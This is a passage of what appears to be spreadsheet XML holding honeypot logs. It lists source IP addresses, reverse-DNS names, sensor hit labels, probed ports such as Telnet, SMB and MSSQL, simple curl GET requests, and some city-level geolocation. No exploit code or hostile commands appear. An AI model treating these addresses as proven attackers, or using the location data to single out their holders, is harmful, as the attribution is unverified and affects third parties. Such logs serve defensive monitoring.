    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_LDAP_H19&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_NTP_H6&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_DNS_H25&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_VNC_H20&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;389&amp;&amp;9100&amp;&amp;123&amp;&amp;445&amp;&amp;53&amp;&amp;80&amp;&amp;5900&amp;&amp;721&amp;&amp;39265&amp;&amp;33433&amp;&amp;33441&amp;&amp;33451&amp;&amp;23</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:122:c856</t>
  </si>
  <si>
    <t>1d8a5861bc516fa5febdd0572815da58</t>
  </si>
  <si>
    <t>117.254.177.72</t>
  </si>
  <si>
    <t>::ffff:75fe:b148</t>
  </si>
  <si>
    <t>22e817367bcf1bc0732869c78f5832a2</t>
  </si>
  <si>
    <t>122.117.59.154</t>
  </si>
  <si>
    <t>NA&amp;&amp;122-117-59-154.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_SIP_H37&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;5060&amp;&amp;16607&amp;&amp;80&amp;&amp;23&amp;&amp;NA&amp;&amp;50732&amp;&amp;9100</t>
  </si>
  <si>
    <t>{'singular.ttk.pte.hu': ['unknown']}</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:7a75:3b9a</t>
  </si>
  <si>
    <t>1ccfeabd03e3c1b1785421d5e02c6749</t>
  </si>
  <si>
    <t>220.134.58.103</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-134-58-103.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMTP_H7&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;25&amp;&amp;52682&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:dc86:3a67</t>
  </si>
  <si>
    <t>89a9a936041260ecacef0ca8a0c835c7</t>
  </si>
  <si>
    <t>59.126.61.136</t>
  </si>
  <si>
    <t>59-126-61-136.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H11</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;31978&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:3b7e:3d88</t>
  </si>
  <si>
    <t>45d971d9390913a6eda63494d229d58f</t>
  </si>
  <si>
    <t>115.245.110.46</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H24</t>
  </si>
  <si>
    <t>::ffff:73f5:6e2e</t>
  </si>
  <si>
    <t>28d4b302ddae9c9fa6bc7ddeac4f6aa1</t>
  </si>
  <si>
    <t>71.25.225.131</t>
  </si>
  <si>
    <t>Tennessee</t>
  </si>
  <si>
    <t>Knox</t>
  </si>
  <si>
    <t>Knoxville</t>
  </si>
  <si>
    <t>4634946</t>
  </si>
  <si>
    <t>37929</t>
  </si>
  <si>
    <t>35.9606</t>
  </si>
  <si>
    <t>-83.9207</t>
  </si>
  <si>
    <t>::ffff:4719:e183</t>
  </si>
  <si>
    <t>d49860c96c3ddc9e311330b8733e50cf</t>
  </si>
  <si>
    <t>59.93.121.117</t>
  </si>
  <si>
    <t>::ffff:3b5d:7975</t>
  </si>
  <si>
    <t>c31a1f8e6dcbc1148cacc1616d59ec7d</t>
  </si>
  <si>
    <t>122.117.18.135</t>
  </si>
  <si>
    <t>122-117-18-135.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;47891&amp;&amp;64279&amp;&amp;23&amp;&amp;80&amp;&amp;58223&amp;&amp;58235&amp;&amp;58238&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:7a75:1287</t>
  </si>
  <si>
    <t>f5dcf8c6687c563666fe5c3a0c5307c6</t>
  </si>
  <si>
    <t>125.229.31.216</t>
  </si>
  <si>
    <t>125-229-31-216.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;10714&amp;&amp;80&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:1fd8</t>
  </si>
  <si>
    <t>97ce276a3dd33f5f3cf046c91b45d07c</t>
  </si>
  <si>
    <t>59.126.78.147</t>
  </si>
  <si>
    <t>59-126-78-147.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7</t>
  </si>
  <si>
    <t>31919&amp;&amp;80&amp;&amp;23&amp;&amp;25151&amp;&amp;42529</t>
  </si>
  <si>
    <t>::ffff:3b7e:4e93</t>
  </si>
  <si>
    <t>73c66bd3d664e7feaebc519964ba1989</t>
  </si>
  <si>
    <t>117.245.195.198</t>
  </si>
  <si>
    <t>::ffff:75f5:c3c6</t>
  </si>
  <si>
    <t>cafe2c08b920e59bc74732f9f380e0aa</t>
  </si>
  <si>
    <t>195.162.82.141</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_DNS_H28&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_SMB_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;1433&amp;&amp;53&amp;&amp;60582&amp;&amp;445</t>
  </si>
  <si>
    <t>48.9226</t>
  </si>
  <si>
    <t>24.711100000000002</t>
  </si>
  <si>
    <t>35004</t>
  </si>
  <si>
    <t>Branch Enterprise Netgroup-Service</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,51099)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,51280)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,53171)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,53328)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,53827)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,53979)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,51539)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,51619)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,65403)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,65500)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,62645)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,62723)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,51399)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,51016)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,51239)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:c3a2:528d</t>
  </si>
  <si>
    <t>d9808b6ea7ad1efeff31ee9f24aa13ad</t>
  </si>
  <si>
    <t>1.34.254.21</t>
  </si>
  <si>
    <t>1-34-254-21.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3672&amp;&amp;80&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:122:fe15</t>
  </si>
  <si>
    <t>9d7b1bb8b60d61baf2de74bbae814d92</t>
  </si>
  <si>
    <t>153.177.124.160</t>
  </si>
  <si>
    <t>p13836160-ipxg46701marunouchi.tokyo.ocn.ne.jp</t>
  </si>
  <si>
    <t>::ffff:99b1:7ca0</t>
  </si>
  <si>
    <t>9d968ff0d4aaa70bc6fb61e4467648f8</t>
  </si>
  <si>
    <t>114.33.81.189</t>
  </si>
  <si>
    <t>114-33-81-189.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;18125&amp;&amp;9100&amp;&amp;NA&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7221:51bd</t>
  </si>
  <si>
    <t>681431e4376effc8ab340fc74d34788b</t>
  </si>
  <si>
    <t>189.173.111.110</t>
  </si>
  <si>
    <t>Hermosillo Municipality</t>
  </si>
  <si>
    <t>Hermosillo</t>
  </si>
  <si>
    <t>4004898</t>
  </si>
  <si>
    <t>29.1026</t>
  </si>
  <si>
    <t>-110.977</t>
  </si>
  <si>
    <t>::ffff:bdad:6f6e</t>
  </si>
  <si>
    <t>50b0a550cde2a4f336209530616cddcc</t>
  </si>
  <si>
    <t>59.184.253.150</t>
  </si>
  <si>
    <t>::ffff:3bb8:fd96</t>
  </si>
  <si>
    <t>df58cea39aa31391d1917dd8974b2a62</t>
  </si>
  <si>
    <t>117.214.195.155</t>
  </si>
  <si>
    <t>::ffff:75d6:c39b</t>
  </si>
  <si>
    <t>1a1109dc679e6fbff7e1ecce1e0bf6f8</t>
  </si>
  <si>
    <t>117.206.196.152</t>
  </si>
  <si>
    <t>::ffff:75ce:c498</t>
  </si>
  <si>
    <t>80d1dc0d8bf7b974fc03b783dc835dde</t>
  </si>
  <si>
    <t>103.24.148.43</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_MSSQL_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;58181&amp;&amp;58197&amp;&amp;58215&amp;&amp;1433&amp;&amp;54049&amp;&amp;54063&amp;&amp;54092&amp;&amp;62838&amp;&amp;63276&amp;&amp;63950&amp;&amp;63964&amp;&amp;63995&amp;&amp;64014&amp;&amp;64086&amp;&amp;64057&amp;&amp;64105</t>
  </si>
  <si>
    <t>23949</t>
  </si>
  <si>
    <t>PT Comtronics Systems</t>
  </si>
  <si>
    <t>COMNET</t>
  </si>
  <si>
    <t>2013-04-17</t>
  </si>
  <si>
    <t>COMNET-ID</t>
  </si>
  <si>
    <t>::ffff:6718:942b</t>
  </si>
  <si>
    <t>96f786c1ce9625a38cadfd6d37f7e6d0</t>
  </si>
  <si>
    <t>117.235.214.199</t>
  </si>
  <si>
    <t>::ffff:75eb:d6c7</t>
  </si>
  <si>
    <t>463e08734eafda07a22a673a3d5bd878</t>
  </si>
  <si>
    <t>101.108.60.55</t>
  </si>
  <si>
    <t>node-bw7.pool-101-108.dynamic.totinternet.net</t>
  </si>
  <si>
    <t>::ffff:656c:3c37</t>
  </si>
  <si>
    <t>1936b25e084790ad376b53c9553acc6b</t>
  </si>
  <si>
    <t>59.126.129.172</t>
  </si>
  <si>
    <t>59-126-129-172.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H39&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;57437&amp;&amp;80&amp;&amp;23&amp;&amp;NA&amp;&amp;19317&amp;&amp;48707&amp;&amp;22430&amp;&amp;40574&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:3b7e:81ac</t>
  </si>
  <si>
    <t>4e2e633031dc9975a7823d70dca1d7e7</t>
  </si>
  <si>
